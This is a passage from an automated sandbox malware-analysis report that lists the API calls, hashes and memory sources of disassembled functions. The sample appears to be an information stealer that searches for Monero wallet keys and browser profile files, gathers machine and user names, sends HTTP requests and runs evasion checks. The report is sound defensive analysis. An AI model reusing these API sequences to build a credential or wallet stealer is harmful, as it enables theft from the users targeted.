                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 3e253fbad67b38f9cdcf73424743f2889f635da81a3b6474b01da4633d313ec3
                  • Instruction ID: 2e3791b1631e9d52ccfa9ff31ae6c7bd0cb1f0acc773e526b095fd47577329d9
                  • Opcode Fuzzy Hash: 3e253fbad67b38f9cdcf73424743f2889f635da81a3b6474b01da4633d313ec3
                  • Instruction Fuzzy Hash: 74014BB0D40308AAEB10DBE1DC4ABAEBB78BF04701F608068E605B6280D67866459B99
                  Function 00FC6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1450 fc6af3 1451 fc6b0a 1450->1451 1453 fc6b0c-fc6b22 call fc6920 call fc5b10 CloseHandle ExitProcess 1451->1453 1454 fc6aba-fc6ad7 call fcaad0 OpenEventA 1451->1454 1460 fc6ad9-fc6af1 call fcaad0 CreateEventA 1454->1460 1461 fc6af5-fc6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00C89008,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00FC6AF9
                  • Sleep.KERNEL32(00001770), ref: 00FC6B04
                  • CloseHandle.KERNEL32(?,00000000,?,00C89008,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6B1A
                  • ExitProcess.KERNEL32 ref: 00FC6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: e325c05725a5fd67ae57e791491075f8be4802e217d0ce9ae5e132d42ff001dd
                  • Instruction ID: f2b777320bddb0558cbf8d1f16d76a1efc2a2a4c35397fabce51c643f401d920
                  • Opcode Fuzzy Hash: e325c05725a5fd67ae57e791491075f8be4802e217d0ce9ae5e132d42ff001dd
                  • Instruction Fuzzy Hash: BDF0307094420BAAE714ABA0AE07F7D7B74EF44705F10452CB527E2181DBB86981F755
                  Function 00FB47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 9c92bc86a21b628652289439950a84916824ab1f6bdb27ff69d108aba2bcd2ce
                  • Instruction ID: 0a7229e7f6386b438e791c7de1e2d485b3b11a592417431db25c490df44b6d84
                  • Opcode Fuzzy Hash: 9c92bc86a21b628652289439950a84916824ab1f6bdb27ff69d108aba2bcd2ce
                  • Instruction Fuzzy Hash: 70212CB1D00209ABDF14DFA5E945BDD7B74FB44320F108629E929A72C0DB746A05DB91
                  Function 00FC51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB6280: InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                    • Part of subcall function 00FB6280: StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB6303
                    • Part of subcall function 00FB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                    • Part of subcall function 00FB6280: HttpOpenRequestA.WININET(00000000,GET,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB6385
                    • Part of subcall function 00FB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                    • Part of subcall function 00FB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 125695dd08d501fe21d1d846b4fcc015415a0b6bfe5de77bae986e875a908152
                  • Instruction ID: 5ca118c45b310877e2c0459afa5c05bb17a3a3ae7f73012344c495b8d407527b
                  • Opcode Fuzzy Hash: 125695dd08d501fe21d1d846b4fcc015415a0b6bfe5de77bae986e875a908152
                  • Instruction Fuzzy Hash: B711F830900009ABCB18FB61DE57FED7378AF50304F80415CA81A4A192EF38BB15EA92
                  Function 00FB1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB1132
                  • ExitProcess.KERNEL32 ref: 00FB1143
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: d435aa593cec33fc1fd0b6295fb9b58112fa3b547148d7639fa6e33461f4167c
                  • Instruction ID: 75fcfaf015bf4fbe6b0a833dae08aef115dd6222ef7aaf758c1723f241da6c4d
                  • Opcode Fuzzy Hash: d435aa593cec33fc1fd0b6295fb9b58112fa3b547148d7639fa6e33461f4167c
                  • Instruction Fuzzy Hash: 16E08670945308FBE7246BA1EC1AB48767CAF04B02F500158F70D771C4C6F926419B98
                  Function 00FB10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FB10B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FB10F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 71573933745f1eb47203e8541e2dc4b82e19289bd1f56df2ed43b17e965b6a6b
                  • Instruction ID: 29e7c0a3c31356872067b4a712dc2bd80a180e28e6d9c327df7fc4f59da43341
                  • Opcode Fuzzy Hash: 71573933745f1eb47203e8541e2dc4b82e19289bd1f56df2ed43b17e965b6a6b
                  • Instruction Fuzzy Hash: C5F0E971641204BBE71496A4AC59FAAB7D8E705B55F300458F504E3280D5726E40DB50
                  Function 00FB1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                    • Part of subcall function 00FC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                    • Part of subcall function 00FC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                    • Part of subcall function 00FC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                    • Part of subcall function 00FC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                    • Part of subcall function 00FC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                  • ExitProcess.KERNEL32 ref: 00FB11C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: aa463097211b01f82bfbf8afeb958f92abd3c5947cd00f96500ef05ef328490a
                  • Instruction ID: fef84329eaefb41e387e83d8ea625990b8a309eb7f32de4e446d5221c0077e09
                  • Opcode Fuzzy Hash: aa463097211b01f82bfbf8afeb958f92abd3c5947cd00f96500ef05ef328490a
                  • Instruction Fuzzy Hash: 1AE0C2B5D0030223CA1433B6BD0BF2A328C6F40385F20043CFA09C3142FA2DF801AA64

                  Non-executed Functions

                  Function 00FC38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00FC38CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC38E3
                  • lstrcat.KERNEL32(?,?), ref: 00FC3935
                  • StrCmpCA.SHLWAPI(?,00FD0F70), ref: 00FC3947
                  • StrCmpCA.SHLWAPI(?,00FD0F74), ref: 00FC395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC3C67
                  • FindClose.KERNEL32(000000FF), ref: 00FC3C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: ba182901db47596e9b79da6e8ded2ee83e8ea1025b9762fcb7fbf4ceaf1666a8
                  • Instruction ID: c62026397b93f8216f1dd746fd78770f126d087a5ce45314ee59ba41ac5db0c8
                  • Opcode Fuzzy Hash: ba182901db47596e9b79da6e8ded2ee83e8ea1025b9762fcb7fbf4ceaf1666a8
                  • Instruction Fuzzy Hash: 36A17FB29002099BCB34DB64DD85FEE7379BF88300F04859CA51E97145EB79AB84DF62
                  Function 00FBBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00FD0B32,00FD0B2B,00000000,?,?,?,00FD13F4,00FD0B2A), ref: 00FBBEF5
                  • StrCmpCA.SHLWAPI(?,00FD13F8), ref: 00FBBF4D
                  • StrCmpCA.SHLWAPI(?,00FD13FC), ref: 00FBBF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBC7BF
                  • FindClose.KERNEL32(000000FF), ref: 00FBC7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 7b39ac6b48869e953637f47cdd7562824a5b895ebce1593deb53070dc9e3c705
                  • Instruction ID: 888022208d8e9f505e44632e9c1d8908fba4658c84a20a0da29e4efb9578a1cf
                  • Opcode Fuzzy Hash: 7b39ac6b48869e953637f47cdd7562824a5b895ebce1593deb53070dc9e3c705
                  • Instruction Fuzzy Hash: 97423372910109ABCB14FB60DE57FEE7379AF84304F40456CB50A96181EF38AB49DBA2
                  Function 00FC4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00FC492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                  • StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                  • StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                  • FindClose.KERNEL32(000000FF), ref: 00FC4B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: f30308f027a39617137692dff5ee270b890f600c17fcf94aa4306e2f7e3e8cfd
                  • Instruction ID: b256ce09fea5d03e95b49bf998b88d215fea6dcdc373a78405179b4abdd88d4c
                  • Opcode Fuzzy Hash: f30308f027a39617137692dff5ee270b890f600c17fcf94aa4306e2f7e3e8cfd
                  • Instruction Fuzzy Hash: EB6162B2900219ABCB34EBA0EC45FEA737CBF48701F04459CA51E92144EB75EB859FA1
